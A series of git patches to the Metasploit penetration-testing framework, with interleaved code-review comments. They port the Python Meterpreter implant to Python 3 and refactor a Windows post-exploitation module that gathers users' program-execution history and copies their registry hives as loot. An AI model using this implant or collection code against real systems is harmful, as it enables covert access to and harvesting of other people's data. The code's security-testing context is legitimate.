@@ -508,7 +508,7 @@ def get_stat_buffer(path): blocks = si.st_blocks st_buf = struct.pack('<IHHH', si.st_dev, min(0xffff, si.st_ino), si.st_mode, si.st_nlink) st_buf += struct.pack('<HHHI', si.st_uid, si.st_gid, 0, rdev) - st_buf += struct.pack('<IIII', si.st_size, si.st_atime, si.st_mtime, si.st_ctime) + st_buf += struct.pack('<IIII', si.st_size, long(si.st_atime), long(si.st_mtime), long(si.st_ctime)) st_buf += struct.pack('<II', blksize, blocks) return st_buf @@ -603,7 +603,7 @@ def channel_open_stdapi_fs_file(request, response): else: fmode = 'rb' file_h = open(fpath, fmode) - channel_id = meterpreter.add_channel(file_h) + channel_id = meterpreter.add_channel(MeterpreterFile(file_h)) response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id) return ERROR_SUCCESS, response @@ -737,11 +737,12 @@ def stdapi_sys_process_getpid(request, response): def stdapi_sys_process_get_processes_via_proc(request, response): for pid in os.listdir('/proc'): - pgroup = '' + pgroup = bytes() if not os.path.isdir(os.path.join('/proc', pid)) or not pid.isdigit(): continue - cmd = open(os.path.join('/proc', pid, 'cmdline'), 'rb').read(512).replace('\x00', ' ') - status_data = open(os.path.join('/proc', pid, 'status'), 'rb').read() + cmdline_file = open(os.path.join('/proc', pid, 'cmdline'), 'rb') + cmd = str(cmdline_file.read(512).replace(NULL_BYTE, bytes(' ', 'UTF-8'))) + status_data = str(open(os.path.join('/proc', pid, 'status'), 'rb').read()) status_data = map(lambda x: x.split('\t',1), status_data.split('\n')) status = {} for k, v in filter(lambda x: len(x) == 2, status_data): @@ -893,7 +894,8 @@ def stdapi_fs_delete_dir(request, response): @meterpreter.register_function def stdapi_fs_delete_file(request, response): file_path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value'] - os.unlink(file_path) + if os.path.exists(file_path): + os.unlink(file_path) return ERROR_SUCCESS, response @meterpreter.register_function 
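Review bot: `stdapi_fs_delete_file` now returns `ERROR_SUCCESS` when the path does not exist, so the caller can no longer tell a completed delete from a no-op, and the `os.path.exists(file_path)` / `os.unlink(file_path)` pair is a check-then-act sequence that can still raise if the file goes away between the two calls. Calling `os.unlink` directly inside a `try:` and handling `OSError` explicitly (deciding there whether a missing file counts as success) keeps the result meaningful and removes the window. The `stdapi_fs_mkdir` hunk, with `if not os.path.isdir(dir_path):` in front of `os.mkdir(dir_path)`, has the same shape and the same remark applies. In the `/proc` listing hunk, `cmdline_file` and the `status` file are opened without being closed, which should be a `with open(...)` block if the file's supported Python versions allow it.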
@@ -955,7 +957,8 @@ def stdapi_fs_md5(request, response): @meterpreter.register_function def stdapi_fs_mkdir(request, response): dir_path = packet_get_tlv(request, TLV_TYPE_DIRECTORY_PATH)['value'] - os.mkdir(dir_path) + if not os.path.isdir(dir_path): + os.mkdir(dir_path) return ERROR_SUCCESS, response @meterpreter.register_function @@ -1423,7 +1426,7 @@ def stdapi_registry_query_value(request, response): if result == ERROR_SUCCESS: response += tlv_pack(TLV_TYPE_VALUE_TYPE, value_type.value) if value_type.value == REG_SZ: - response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data) + '\x00') + response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data) + NULL_BYTE) elif value_type.value == REG_DWORD: value = value_data[:4] value.reverse() diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py index 63a3f43e8e..c206d0b8a7 100644 --- a/data/meterpreter/meterpreter.py +++ b/data/meterpreter/meterpreter.py @@ -146,7 +146,7 @@ def packet_enum_tlvs(pkt, tlv_type = None): if (tlv_type == None) or ((tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type): val = pkt[offset+8:(offset+8+(tlv[0] - 8))] if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING: - val = val.split(NULL_BYTE, 1)[0] + val = str(val.split(NULL_BYTE, 1)[0]) elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT: val = struct.unpack('>I', val)[0] elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL: @@ -190,6 +190,15 @@ def tlv_pack(*args): data = struct.pack('>II', 8 + len(value), tlv['type']) + value return data +#@export +class MeterpreterFile(object): + def __init__(self, file_obj): + self.file_obj = file_obj + + def __getattr__(self, name): + return getattr(self.file_obj, name) +export(MeterpreterFile) + #@export class MeterpreterSocket(object): def __init__(self, sock): 
@@ -271,6 +280,7 @@ class PythonMeterpreter(object): return func def add_channel(self, channel): + assert(isinstance(channel, (subprocess.Popen, MeterpreterFile, MeterpreterSocket))) idx = 0 while idx in self.channels: idx += 1 @@ -392,10 +402,10 @@ class PythonMeterpreter(object): if channel_id not in self.channels: return ERROR_FAILURE, response channel = self.channels[channel_id] - if isinstance(channel, file): - channel.close() - elif isinstance(channel, subprocess.Popen): + if isinstance(channel, subprocess.Popen): channel.kill() + elif isinstance(channel, MeterpreterFile): + channel.close() elif isinstance(channel, MeterpreterSocket): channel.close() else: @@ -411,7 +421,7 @@ class PythonMeterpreter(object): return ERROR_FAILURE, response channel = self.channels[channel_id] result = False - if isinstance(channel, file): + if isinstance(channel, MeterpreterFile): result = channel.tell() >= os.fstat(channel.fileno()).st_size response += tlv_pack(TLV_TYPE_BOOL, result) return ERROR_SUCCESS, response @@ -438,13 +448,13 @@ class PythonMeterpreter(object): return ERROR_FAILURE, response channel = self.channels[channel_id] data = '' - if isinstance(channel, file): - data = channel.read(length) - elif isinstance(channel, STDProcess): + if isinstance(channel, STDProcess): if channel.poll() != None: self.handle_dead_resource_channel(channel_id) if channel.stdout_reader.is_read_ready(): data = channel.stdout_reader.read(length) + elif isinstance(channel, MeterpreterFile): + data = channel.read(length) elif isinstance(channel, MeterpreterSocket): data = channel.recv(length) else: 
@@ -460,13 +470,13 @@ class PythonMeterpreter(object): return ERROR_FAILURE, response channel = self.channels[channel_id] l = len(channel_data) - if isinstance(channel, file): - channel.write(channel_data) - elif isinstance(channel, subprocess.Popen): + if isinstance(channel, subprocess.Popen): if channel.poll() != None: self.handle_dead_resource_channel(channel_id) return ERROR_FAILURE, response channel.stdin.write(channel_data) + elif isinstance(channel, MeterpreterFile): + channel.write(channel_data) elif isinstance(channel, MeterpreterSocket): try: l = channel.send(channel_data) @@ -487,7 +497,7 @@ class PythonMeterpreter(object): reqid_tlv = packet_get_tlv(request, TLV_TYPE_REQUEST_ID) resp += tlv_pack(reqid_tlv) - handler_name = str(method_tlv['value']) + handler_name = method_tlv['value'] if handler_name in self.extension_functions: handler = self.extension_functions[handler_name] try: From cdabb71d233ba69c2481bbaa42eb8e8a392a3e0e Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Thu, 29 May 2014 14:51:10 -0500 Subject: [PATCH 411/853] Make code cleanup --- modules/post/windows/gather/enum_muicache.rb | 102 +++++++++---------- 1 file changed, 50 insertions(+), 52 deletions(-) diff --git a/modules/post/windows/gather/enum_muicache.rb b/modules/post/windows/gather/enum_muicache.rb index f33bc63c93..e88dc57769 100644 --- a/modules/post/windows/gather/enum_muicache.rb +++ b/modules/post/windows/gather/enum_muicache.rb 
@@ -17,59 +17,58 @@ class Metasploit3 < Msf::Post 'Name' =>'Windows Gather Enum User MUICache', 'Description' => %q{ - This module gathers information about the files and file paths that - logged on users have executed on the system and it will also check - if the file still exists on the system in the file path it has been - previously executed. This information is gathered by using information - stored under the MUICache registry key. If the user is logged in when the - module is executed it will collect the MUICache entries by accessing - the registry directly. If the user is not logged in the module will - download users registry hive NTUSER.DAT/UsrClass.dat from the system - and the MUICache contents are parsed from the downloaded hive. - }, - 'License' => MSF_LICENSE, - 'Author' => ['TJ Glad <tjglad[at]cmail.nu>'], - 'Platform' => ['win'], - 'SessionType' => ['meterpreter'] - )) + This module gathers information about the files and file paths that logged on users have + executed on the system. It also will check if the file exists on the system still. This + information is gathered by using information stored under the MUICache registry key. If + the user is logged in when the module is executed it will collect the MUICache entries + by accessing the registry directly. If the user is not logged in the module will download + users registry hive NTUSER.DAT/UsrClass.dat from the system and the MUICache contents are + parsed from the downloaded hive. + }, + 'License' => MSF_LICENSE, + 'Author' => ['TJ Glad <tjglad[at]cmail.nu>'], + 'Platform' => ['win'], + 'SessionType' => ['meterpreter'] + )) end - def find_usernames() + def find_user_names() # This function scrapes usernames, sids and homepaths from the # registry so that we'll know what user accounts are on the system # and where we can find those users registry hives. 
- usernames = Array.new - user_homedir_paths = Array.new - user_sids = Array.new + user_names = [] + user_homedir_paths = [] + user_sids = [] username_reg_path = "HKLM\\Software\\Microsoft\\Windows\ NT\\CurrentVersion\\ProfileList" profile_subkeys = registry_enumkeys(username_reg_path) if profile_subkeys.blank? print_error("Unable to access ProfileList registry key. Can't continue.") return nil - else - profile_subkeys.each do |user_sid| - if user_sid.length > 10 - user_home_path = registry_getvaldata("#{username_reg_path}\\#{user_sid}", "ProfileImagePath") - unless user_home_path.blank? - full_path = user_home_path.strip - usernames << full_path.split("\\").last - user_homedir_paths << full_path - user_sids << user_sid - else - print_error("Unable to read ProfileImagePath from the registry. Can't continue.") - return nil - end - end - end end - return usernames, user_homedir_paths, user_sids + + profile_subkeys.each do |user_sid| + unless user_sid.length > 10 + next + end + user_home_path = registry_getvaldata("#{username_reg_path}\\#{user_sid}", "ProfileImagePath") + if user_home_path.blank? + print_error("Unable to read ProfileImagePath from the registry. Can't continue.") + return nil + end + full_path = user_home_path.strip + user_names << full_path.split("\\").last + user_homedir_paths << full_path + user_sids << user_sid + end + + return user_names, user_homedir_paths, user_sids end def enum_muicache_paths(sys_sids, mui_path) # This function builds full registry muicache paths so that we can # later enumerate the muicahe registry key contents. - user_mui_paths = Array.new + user_mui_paths = [] hive = "HKU\\" sys_sids.each do |sid| full_path = hive + sid + mui_path 
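Review bot: The re-indented metadata in enum_muicache.rb still declares `'SessionType' => ['meterpreter']`, while the other module on this page (ms14_009_ie_dfsvc.rb) uses the plural key `'SessionTypes'`; the singular spelling is probably not the key the framework reads for session compatibility, so it should be confirmed and changed to `'SessionTypes' => ['meterpreter']`. In `find_user_names`, the three-line `unless user_sid.length > 10` / `next` / `end` is more direct as `next unless user_sid.length > 10`, and the literal 10 needs a comment saying which ProfileList subkeys it is meant to skip. The method returns a bare `nil` on either failure path but three arrays on success, which is worth stating in the comment above it because callers destructure the result.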
@@ -114,13 +113,11 @@ class Metasploit3 < Msf::Post # if it detects the executable but it should be otherwise fairly # reliable. program_path = expand_path(key) - program_exists = file_exist?(key) - if program_exists == true - exists = "File found" + if file_exist?(key) + table << [user, program_path, "File found"] else - exists = "File not found" + table << [user, program_path, "File not found"] end - table << [user, program_path, exists] end def process_hive(sys_path, user, local_hive_copy, table, muicache, hive_file) @@ -211,10 +208,10 @@ class Metasploit3 < Msf::Post return table end - def print_usernames(sys_users) + def print_user_names(sys_users) # This prints usernames pulled from the paths found from the # registry. - user_list = Array.new + user_list = [] sys_users.each do |user| user_list << user end @@ -232,14 +229,14 @@ class Metasploit3 < Msf::Post # - http://www.irongeek.com/i.php?page=security/windows-forensics-registry-and-file-system-spots print_status("Starting to enumerate MuiCache registry keys..") - sysnfo = sysinfo['OS'] + sys_info = sysinfo['OS'] - if sysnfo =~/(Windows XP)/ and is_admin? - print_good("Remote system supported: #{sysnfo}") + if sys_info =~/Windows XP/ && is_admin? + print_good("Remote system supported: #{sys_info}") muicache = "\\Software\\Microsoft\\Windows\\ShellNoRoam\\MUICache" hive_file = "\\NTUSER.DAT" - elsif sysnfo =~/(Windows 7)/ and is_admin? - print_good("Remote system supported: #{sysnfo}") + elsif sys_info =~/Windows 7/ && is_admin? + print_good("Remote system supported: #{sys_info}") muicache = "_Classes\\Local\ Settings\\Software\\Microsoft\\Windows\\Shell\\MuiCache" hive_file = "\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat" else 
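Review bot: In the first hunk, `program_path = expand_path(key)` is what gets written to the table, but the existence test still runs on the unexpanded value, `file_exist?(key)`; if `key` can hold environment-variable references (presumably the reason `expand_path` is called), the row can pair an expanded path with a "File not found" that was decided for a different string. Testing the expanded value, `if file_exist?(program_path)`, makes the two columns agree. The two branches now differ only in the status text, so `table << [user, program_path, file_exist?(program_path) ? "File found" : "File not found"]` states the same thing once. The enclosing method starts outside the hunk.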
@@ -258,12 +255,13 @@ class Metasploit3 < Msf::Post ]) print_status("Phase 1: Searching usernames..") - sys_users, sys_paths, sys_sids = find_usernames() - unless sys_users.blank? - print_usernames(sys_users) - else + sys_users, sys_paths, sys_sids = find_user_names() + + if sys_users.blank? print_error("Was not able to find any user accounts. Unable to continue.") return nil + else + print_user_names(sys_users) end print_status("Phase 2: Searching registry hives..") From 04e94b0c070cecfa6203f9b91101a2a771dbc497 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre <zeroSteiner@gmail.com> Date: Thu, 29 May 2014 16:42:28 -0400 Subject: [PATCH 412/853] Fix meterpreter and file tests for Python v3.4 on Win --- data/meterpreter/ext_server_stdapi.py | 43 ++++++++------------------- data/meterpreter/meterpreter.py | 6 ++-- 2 files changed, 15 insertions(+), 34 deletions(-) diff --git a/data/meterpreter/ext_server_stdapi.py b/data/meterpreter/ext_server_stdapi.py index 416e2dbc41..41b07b142c 100644 --- a/data/meterpreter/ext_server_stdapi.py +++ b/data/meterpreter/ext_server_stdapi.py @@ -49,10 +49,12 @@ except ImportError: has_winreg = False if sys.version_info[0] < 3: + is_str = lambda obj: issubclass(obj.__class__, str) is_bytes = lambda obj: issubclass(obj.__class__, str) bytes = lambda *args: str(*args[:1]) NULL_BYTE = '\x00' else: + is_str = lambda obj: issubclass(obj.__class__, __builtins__['str']) is_bytes = lambda obj: issubclass(obj.__class__, bytes) str = lambda x: __builtins__['str'](x, 'UTF-8') NULL_BYTE = bytes('\x00', 'UTF-8') 
@@ -546,31 +548,6 @@ def netlink_request(req_type): sock.close() return responses -def _netlink_request(req_type): - # See RFC 3549 - NLM_F_REQUEST = 0x0001 - NLM_F_ROOT = 0x0100 - NLMSG_ERROR = 0x0002 - NLMSG_DONE = 0x0003 - - sock = socket.socket(socket.AF_NETLINK, socket.SOCK_RAW, socket.NETLINK_ROUTE) - sock.bind((os.getpid(), 0)) - seq = int(time.time()) - nlmsg = struct.pack('IHHIIB15x', 32, req_type, (NLM_F_REQUEST | NLM_F_ROOT), seq, 0, socket.AF_UNSPEC) - sfd = os.fdopen(sock.fileno(), 'w+b') - sfd.write(nlmsg) - responses = [] - response = cstruct_unpack(NLMSGHDR, sfd.read(ctypes.sizeof(NLMSGHDR))) - while response.type != NLMSG_DONE: - if response.type == NLMSG_ERROR: - break - response_data = sfd.read(response.len - 16) - responses.append(response_data) - response = cstruct_unpack(NLMSGHDR, sfd.read(ctypes.sizeof(NLMSGHDR))) - sfd.close() - sock.close() - return responses - def resolve_host(hostname, family): address_info = socket.getaddrinfo(hostname, 0, family, socket.SOCK_DGRAM, socket.IPPROTO_UDP)[0] family = address_info[0] @@ -837,7 +814,7 @@ def stdapi_sys_process_get_processes_via_windll(request, response): use = ctypes.c_ulong() use.value = 0 ctypes.windll.advapi32.LookupAccountSidA(None, user_tkn.Sid, username, ctypes.byref(u_len), domain, ctypes.byref(d_len), ctypes.byref(use)) - complete_username = ctypes.string_at(domain) + '\\' + ctypes.string_at(username) + complete_username = str(ctypes.string_at(domain)) + '\\' + str(ctypes.string_at(username)) k32.CloseHandle(tkn_h) parch = windll_GetNativeSystemInfo() is_wow64 = ctypes.c_ubyte() @@ -846,7 +823,7 @@ def stdapi_sys_process_get_processes_via_windll(request, response): if k32.IsWow64Process(proc_h, ctypes.byref(is_wow64)): if is_wow64.value: parch = PROCESS_ARCH_X86 - pgroup = '' + pgroup = bytes() pgroup += tlv_pack(TLV_TYPE_PID, pe32.th32ProcessID) pgroup += tlv_pack(TLV_TYPE_PARENT_PID, pe32.th32ParentProcessID) pgroup += tlv_pack(TLV_TYPE_USER_NAME, complete_username) 
@@ -902,9 +879,10 @@ def stdapi_fs_delete_file(request, response): def stdapi_fs_file_expand_path(request, response): path_tlv = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value'] if has_windll: + path_tlv = ctypes.create_string_buffer(bytes(path_tlv, 'UTF-8')) path_out = (ctypes.c_char * 4096)() - path_out_len = ctypes.windll.kernel32.ExpandEnvironmentStringsA(path_tlv, ctypes.byref(path_out), ctypes.sizeof(path_out)) - result = ''.join(path_out)[:path_out_len] + path_out_len = ctypes.windll.kernel32.ExpandEnvironmentStringsA(ctypes.byref(path_tlv), ctypes.byref(path_out), ctypes.sizeof(path_out)) + result = str(ctypes.string_at(path_out)) elif path_tlv == '%COMSPEC%': result = '/bin/sh' elif path_tlv in ['%TEMP%', '%TMP%']: @@ -1011,7 +989,7 @@ def stdapi_fs_stat(request, response): @meterpreter.register_function def stdapi_net_config_get_interfaces(request, response): - if hasattr(socket, 'AF_NETLINK'): + if hasattr(socket, 'AF_NETLINK') and hasattr(socket, 'NETLINK_ROUTE'): interfaces = stdapi_net_config_get_interfaces_via_netlink() elif has_osxsc: interfaces = stdapi_net_config_get_interfaces_via_osxsc() @@ -1184,7 +1162,10 @@ def stdapi_net_config_get_interfaces_via_windll(): iface_info['index'] = AdapterAddresses.u.s.IfIndex if AdapterAddresses.PhysicalAddressLength: iface_info['hw_addr'] = ctypes.string_at(ctypes.byref(AdapterAddresses.PhysicalAddress), AdapterAddresses.PhysicalAddressLength) - iface_info['name'] = str(ctypes.wstring_at(AdapterAddresses.Description)) + iface_desc = ctypes.wstring_at(AdapterAddresses.Description) + if not is_str(iface_desc): + iface_desc = str(iface_desc) + iface_info['name'] = iface_desc iface_info['mtu'] = AdapterAddresses.Mtu pUniAddr = AdapterAddresses.FirstUnicastAddress while pUniAddr: diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py index c206d0b8a7..7bc733cfc5 100644 --- a/data/meterpreter/meterpreter.py +++ b/data/meterpreter/meterpreter.py 
@@ -502,17 +502,17 @@ class PythonMeterpreter(object): handler = self.extension_functions[handler_name] try: if DEBUGGING: - print("[*] running method {0}".format(handler_name)) + print('[*] running method ' + handler_name) result, resp = handler(request, resp) except Exception: if DEBUGGING: - print("[-] method {0} resulted in an error".format(handler_name)) + print('[-] method ' + handler_name + ' resulted in an error') exc_type, exc_value, exc_traceback = sys.exc_info() traceback.print_exception(exc_type, exc_value, exc_traceback, file=sys.stderr) result = ERROR_FAILURE else: if DEBUGGING: - print("[-] method {0} was requested but does not exist".format(handler_name)) + print('[-] method ' + handler_name + ' was requested but does not exist') result = ERROR_FAILURE resp += tlv_pack(TLV_TYPE_RESULT, result) resp = struct.pack('>I', len(resp) + 4) + resp From cbbd7bfdf4e1c5cfab0e212fda2f754db92d2ec6 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Thu, 29 May 2014 15:55:44 -0500 Subject: [PATCH 413/853] Refacotor code --- modules/post/windows/gather/enum_muicache.rb | 252 ++++++++++--------- 1 file changed, 130 insertions(+), 122 deletions(-) diff --git a/modules/post/windows/gather/enum_muicache.rb b/modules/post/windows/gather/enum_muicache.rb index e88dc57769..aeada12240 100644 --- a/modules/post/windows/gather/enum_muicache.rb +++ b/modules/post/windows/gather/enum_muicache.rb @@ -32,10 +32,10 @@ class Metasploit3 < Msf::Post )) end - def find_user_names() - # This function scrapes usernames, sids and homepaths from the - # registry so that we'll know what user accounts are on the system - # and where we can find those users registry hives. + # Scrapes usernames, sids and homepaths from the registry so that we'll know + # what user accounts are on the system and where we can find those users + # registry hives. + def find_user_names user_names = [] user_homedir_paths = [] user_sids = [] 
@@ -65,169 +65,174 @@ class Metasploit3 < Msf::Post return user_names, user_homedir_paths, user_sids end + # This function builds full registry muicache paths so that we can + # later enumerate the muicahe registry key contents. def enum_muicache_paths(sys_sids, mui_path) - # This function builds full registry muicache paths so that we can - # later enumerate the muicahe registry key contents. user_mui_paths = [] hive = "HKU\\" + sys_sids.each do |sid| full_path = hive + sid + mui_path user_mui_paths << full_path end - return user_mui_paths + + user_mui_paths end - def enumerate_muicache(muicache_reg_keys, sys_users, sys_paths, muicache, hive_file, table) - # This is the main enumeration function that calls other main - # functions depending if we can access the registry directly or if - # we need to download the hive and process it locally. + # This is the main enumeration function that calls other main + # functions depending if we can access the registry directly or if + # we need to download the hive and process it locally. + def enumerate_muicache(muicache_reg_keys, sys_users, sys_paths, muicache, hive_file) + results = [] + loot_path = Msf::Config::loot_directory all_user_entries = sys_users.zip(muicache_reg_keys, sys_paths) + all_user_entries.each do |user, reg_key, sys_path| local_hive_copy = ::File.join(loot_path, "#{sysinfo['Computer']}_#{user}_HIVE_#{::Time.now.utc.strftime('%Y%m%d.%M%S')}") subkeys = registry_enumvals(reg_key) - unless subkeys.blank? + if subkeys.blank? + # If the registry_enumvals returns us nothing then we'll know + # that the user is most likely not logged in and we'll need to + # download and process users hive locally. + print_error("User #{user}: Can't access registry (maybe the user is not logged in atm?). 
Trying NTUSER.DAT/USRCLASS.DAT..") + results = process_hive(sys_path, user, local_hive_copy, muicache, hive_file) || [] + else # If the registry_enumvals returns us content we'll know that we # can access the registry directly and thus continue to process # the content collected from there. print_status("User #{user}: Enumerating registry..") subkeys.each do |key| if key[0] != "@" and key != "LangID" and not key.nil? - check_file_exists(key, user, table) + result = check_file_exists(key, user) + results << result unless result.nil? end end - else - # If the registry_enumvals returns us nothing then we'll know - # that the user is most likely not logged in and we'll need to - # download and process users hive locally. - print_error("User #{user}: Can't access registry (maybe the user is not logged in atm?). Trying NTUSER.DAT/USRCLASS.DAT..") - process_hive(sys_path, user, local_hive_copy, table, muicache, hive_file) end end - return table + + results end - def check_file_exists(key, user, table) - # This function will check if it can find the program executable - # from the path it found from the registry. Permissions might affect - # if it detects the executable but it should be otherwise fairly - # reliable. + # This function will check if it can find the program executable + # from the path it found from the registry. Permissions might affect + # if it detects the executable but it should be otherwise fairly + # reliable. + def check_file_exists(key, user) program_path = expand_path(key) if file_exist?(key) - table << [user, program_path, "File found"] + return [user, program_path, "File found"] else - table << [user, program_path, "File not found"] + return [user, program_path, "File not found"] end end - def process_hive(sys_path, user, local_hive_copy, table, muicache, hive_file) - # This function will check if the filepath contains a registry hive - # and if it does it'll proceed to call the function responsible of - # downloading the hive. 
After successfull download it'll continue to - # call the hive_parser function which will extract the contents of - # the MUICache registry key. + # This function will check if the filepath contains a registry hive + # and if it does it'll proceed to call the function responsible of + # downloading the hive. After successfull download it'll continue to + # call the hive_parser function which will extract the contents of + # the MUICache registry key. + def process_hive(sys_path, user, local_hive_copy, muicache, hive_file) user_home_path = expand_path(sys_path) hive_path = user_home_path + hive_file - ntuser_status = client.fs.file.exists?(hive_path) - if ntuser_status == true - print_status("Downloading #{user}'s NTUSER.DAT/USRCLASS.DAT file..") - hive_status = hive_download_status(local_hive_copy, hive_path) - if hive_status == true - hive_parser(local_hive_copy, muicache, user, table) - else - print_error("All registry hive download attempts failed. Unable to continue.") - return nil - end - else + ntuser_status = file_exist?(hive_path) + + unless ntuser_status == true print_error("Couldn't locate/download #{user}'s registry hive. Can't proceed.") return nil end - end - def hive_download_status(local_hive_copy, hive_path) - # This function downloads registry hives and checks for integrity - # after the transfer has completed so that we don't end up - # processing broken registry hive. - hive_status = false - 3.times do - remote_hive_hash_raw = client.fs.file.md5(hive_path) - unless remote_hive_hash_raw.blank? 
- remote_hive_hash = remote_hive_hash_raw.unpack('H*') - session.fs.file.download_file(local_hive_copy, hive_path) - local_hive_hash = file_local_digestmd5(local_hive_copy) - if local_hive_hash == remote_hive_hash[0] - print_good("Hive downloaded successfully.") - hive_status = true - break - else - print_error("Hive download corrupted, trying again (max 3 times)..") - File.delete(local_hive_copy) # Downloaded corrupt hive gets deleted before new attempt is made - hive_status = false - end - end + print_status("Downloading #{user}'s NTUSER.DAT/USRCLASS.DAT file..") + hive_status = hive_download_status(local_hive_copy, hive_path) + + unless hive_status == true + print_error("All registry hive download attempts failed. Unable to continue.") + return nil end - return hive_status + + hive_parser(local_hive_copy, muicache, user) end - def hive_parser(local_hive_copy, muicache, user, table) - # This function is responsible for parsing the downloaded hive and - # extracting the contents of the MUICache registry key. - print_status("Phase 3: Parsing registry content..") + # This function downloads registry hives and checks for integrity + # after the transfer has completed so that we don't end up + # processing broken registry hive. + def hive_download_status(local_hive_copy, hive_path) + hive_status = false + + 3.times do + remote_hive_hash_raw = file_remote_digestmd5(hive_path) + if remote_hive_hash_raw.blank? 
+ next + end + + remote_hive_hash = remote_hive_hash_raw.unpack('H*') + session.fs.file.download_file(local_hive_copy, hive_path) + local_hive_hash = file_local_digestmd5(local_hive_copy) + if local_hive_hash == remote_hive_hash[0] + print_good("Hive downloaded successfully.") + hive_status = true + break + else + print_error("Hive download corrupted, trying again (max 3 times)..") + File.delete(local_hive_copy) # Downloaded corrupt hive gets deleted before new attempt is made + hive_status = false + end + + end + + hive_status + end + + # This function is responsible for parsing the downloaded hive and + # extracting the contents of the MUICache registry key. + def hive_parser(local_hive_copy, muicache, user) + results = [] + print_status("Parsing registry content..") err_msg = "Error parsing hive. Can't continue." hive = Rex::Registry::Hive.new(local_hive_copy) if hive.nil? print_error(err_msg) return nil - else - muicache_key = hive.relative_query(muicache) - if muicache_key.nil? - print_error(err_msg) - return nil - else - muicache_key_value_list = muicache_key.value_list - if muicache_key_value_list.nil? - print_error(err_msg) - return nil - else - muicache_key_values = muicache_key_value_list.values - if muicache_key_values.nil? - print_error(err_msg) - return nil - else - muicache_key_values.each do |value| - key = value.name - if key[0] != "@" and key != "LangID" and not key.nil? - check_file_exists(key, user, table) - end - end - end - end + end + + muicache_key = hive.relative_query(muicache) + if muicache_key.nil? + print_error(err_msg) + return nil + end + + muicache_key_value_list = muicache_key.value_list + if muicache_key_value_list.nil? + print_error(err_msg) + return nil + end + + muicache_key_values = muicache_key_value_list.values + if muicache_key_values.nil? + print_error(err_msg) + return nil + end + + muicache_key_values.each do |value| + key = value.name + if key[0] != "@" and key != "LangID" and not key.nil? 
+ result = check_file_exists(key, user) + results << result unless result.nil? end end + File.delete(local_hive_copy) # Downloaded hive gets deleted after processing - return table - end - - def print_user_names(sys_users) - # This prints usernames pulled from the paths found from the - # registry. - user_list = [] - sys_users.each do |user| - user_list << user - end - users = user_list.join(", ") - print_good("Found users: #{users}") + + results end + # Information about the MUICache registry key was collected from: + # + # - Windows Forensic Analysis Toolkit / 2012 / Harlan Carvey + # - Windows Registry Forensics / 2011 / Harlan Carvey + # - http://forensicartifacts.com/2010/08/registry-muicache/ + # - http://www.irongeek.com/i.php?page=security/windows-forensics-registry-and-file-system-spots def run - - # Information about the MUICache registry key was collected from: - # - # - Windows Forensic Analysis Toolkit / 2012 / Harlan Carvey - # - Windows Registry Forensics / 2011 / Harlan Carvey - # - http://forensicartifacts.com/2010/08/registry-muicache/ - # - http://www.irongeek.com/i.php?page=security/windows-forensics-registry-and-file-system-spots - print_status("Starting to enumerate MuiCache registry keys..") sys_info = sysinfo['OS'] 
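Review bot: The `not key.nil?` test in hive_parser's value loop runs after `key[0]` has already been evaluated, so a nil name raises NoMethodError before the guard can take effect; the matching loop in enumerate_muicache has the same ordering. Testing nil first fixes it and avoids the `and`/`not` keywords: `next if key.nil? || key[0] == "@" || key == "LangID"`. Separately, each early `return nil` in hive_parser skips `File.delete(local_hive_copy)`, so a hive that fails to parse stays in the loot directory. Moving the delete into an `ensure` clause would remove the copied hive on every path.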
@@ -254,24 +259,27 @@ class Metasploit3 < Msf::Post "File status", ]) - print_status("Phase 1: Searching usernames..") - sys_users, sys_paths, sys_sids = find_user_names() + print_status("Phase 1: Searching user names..") + sys_users, sys_paths, sys_sids = find_user_names if sys_users.blank? print_error("Was not able to find any user accounts. Unable to continue.") return nil else - print_user_names(sys_users) + print_good("Users found: #{sys_users.join(", ")}") end print_status("Phase 2: Searching registry hives..") muicache_reg_keys = enum_muicache_paths(sys_sids, muicache) - results = enumerate_muicache(muicache_reg_keys, sys_users, sys_paths, muicache, hive_file, table).to_s + results = enumerate_muicache(muicache_reg_keys, sys_users, sys_paths, muicache, hive_file) - print_status("Phase 4: Processing results..") - loot = store_loot("muicache_info", "text/plain", session, results, nil, "MUICache Information") - print_line("\n" + results + "\n") + results.each { |r| table << r } + + print_status("Phase 3: Processing results..") + loot = store_loot("muicache_info", "text/plain", session, table.to_s, nil, "MUICache Information") + print_line("\n" + table.to_s + "\n") print_status("Results stored in: #{loot}") print_status("Execution finished.") end + end From 95b71dee00ce9ddc09099e71a48dedabc93cf2e7 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Thu, 29 May 2014 16:12:51 -0500 Subject: [PATCH 414/853] Try to fix crash while file_remote_digest --- modules/post/windows/gather/enum_muicache.rb | 14 ++++++++++++-- 1 file changed, 12 insertions(+), 2 deletions(-) diff --git a/modules/post/windows/gather/enum_muicache.rb b/modules/post/windows/gather/enum_muicache.rb index aeada12240..bd3fa53ec3 100644 --- a/modules/post/windows/gather/enum_muicache.rb +++ b/modules/post/windows/gather/enum_muicache.rb 
